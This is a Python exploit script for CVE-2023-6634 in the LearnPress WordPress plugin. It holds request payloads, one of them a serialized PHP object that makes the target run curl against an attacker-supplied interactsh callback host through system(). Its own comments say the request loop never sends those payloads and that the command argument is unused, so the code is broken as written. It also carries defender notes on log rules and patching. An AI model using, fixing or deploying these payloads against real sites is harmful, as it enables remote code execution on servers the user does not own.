import sys
import requests
from urllib.parse import quote
def construct_final_url(interactsh_url, padstr):
    """Return ``interactsh_url`` with ``padstr`` appended directly after it.

    No separator is inserted and neither value is validated or URL-encoded;
    the result is a plain concatenation of the two formatted values.
    """
    return "{}{}".format(interactsh_url, padstr)
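def exploit(target_url, interactsh_url, command):
    """Issue one GET per entry in ``payloads`` against the target's REST route.

    As written, every request goes to
    ``<target_url>/wp-json/lp/v1/load_content_via_ajax/`` with no query
    string: the entries of ``payloads`` only determine how many requests are
    made and are not part of what is sent. The printed responses therefore
    show whether the route answers; they are not evidence for or against
    exposure to CVE-2023-6634.

    Args:
        target_url: Base URL of the site, scheme included. A trailing slash
            produces a double slash in the request URL.
        interactsh_url: Joined with the pad string by ``construct_final_url``
            and embedded in the second payload string.
        command: Accepted so the command-line interface stays unchanged; this
            function does not use it.

    Defender notes:
        The payload strings correspond to requests for the route above whose
        ``callback`` query parameter names a class/method pair and whose
        ``args`` parameter carries either a marker string or a URL-encoded
        serialized object (``O%3a...``). Access-log or WAF rules on that
        combination, together with alerting on unexpected outbound HTTP from
        the web server, cover the behaviour described here. Remediation is to
        update the plugin that registers the ``lp/v1`` REST namespace
        (LearnPress) to a release that fixes CVE-2023-6634.
    """
    padstr = "random_string"  # Fixed marker; the original notes it could be random
    finalurl = construct_final_url(interactsh_url, padstr)

    # Request-line strings kept exactly as published. They are never attached
    # to the HTTP request built in the loop below.
    payloads = [
        f'GET /wp-json/lp/v1/load_content_via_ajax/?callback={{"class"%3a"LP_Debug","method"%3a"var_dump"}}&args="{padstr}" HTTP/1.1',
        f'GET /wp-json/lp/v1/load_content_via_ajax/?callback={{"class"%3a"LP_Helper","method"%3a"maybe_unserialize"}}&args="O%3a13%3a\u0022WP_HTML_Token\u0022%3a2%3a{{s%3a13%3a\u0022bookmark_name\u0022%3bs%3a64%3a\u0022curl+{finalurl}\u0022%3bs%3a10%3a\u0022on_destroy\u0022%3bs%3a6%3a\u0022system\u0022%3b}}" HTTP/1.1',
    ]

    headers = {
        # Only the scheme text is stripped, so any path in target_url ends up
        # inside the Host header value.
        'Host': target_url.replace('http://', '').replace('https://', ''),
        'Connection': 'close'
    }

    for payload in payloads:
        # The URL is the same on every iteration and contains no parameters.
        request_url = f"{target_url}/wp-json/lp/v1/load_content_via_ajax/"
        try:
            response = requests.get(request_url, headers=headers, timeout=10)
            print(f"Payload sent. Response:\n{response.text}")
        except requests.RequestException as e:
            # Limit handling to transport/HTTP errors raised by requests so
            # that programming errors are not hidden behind this message.
            print(f"Error sending payload: {e}")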
if __name__ == "__main__":
    # Exactly three positional arguments are required after the script name.
    cli_args = sys.argv[1:]
    if len(cli_args) != 3:
        print("Usage: python CVE-2023-6634.py <target_url> <interactsh_url> <command>")
        sys.exit(1)

    target_url, interactsh_url, command = cli_args
    exploit(target_url, interactsh_url, command)